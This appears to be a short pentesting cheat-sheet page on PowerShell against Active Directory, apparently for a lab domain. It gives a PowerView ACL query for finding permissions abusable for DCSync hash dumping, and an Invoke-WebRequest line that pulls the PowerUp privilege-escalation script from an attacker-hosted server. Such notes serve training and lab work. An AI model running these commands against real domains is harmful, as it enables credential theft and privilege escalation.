Powershell

1. Active Directory

1.1 Misconfigured Object Permissions

Import the Powerview module which will allow you to check for misconfigured object permissions that can be abused to dump DC password hashes using the DCSync technique. If you are unfamiliar with technique you can read about it here http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/arrow-up-right.

Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}

2. Miscellaneous Commands

2.1 Download Files

Invoke-WebRequest http://10.10.15.188:8000/PowerUp.ps1arrow-up-right -OutFile C:\Temp\PowerUp.ps1

Last updated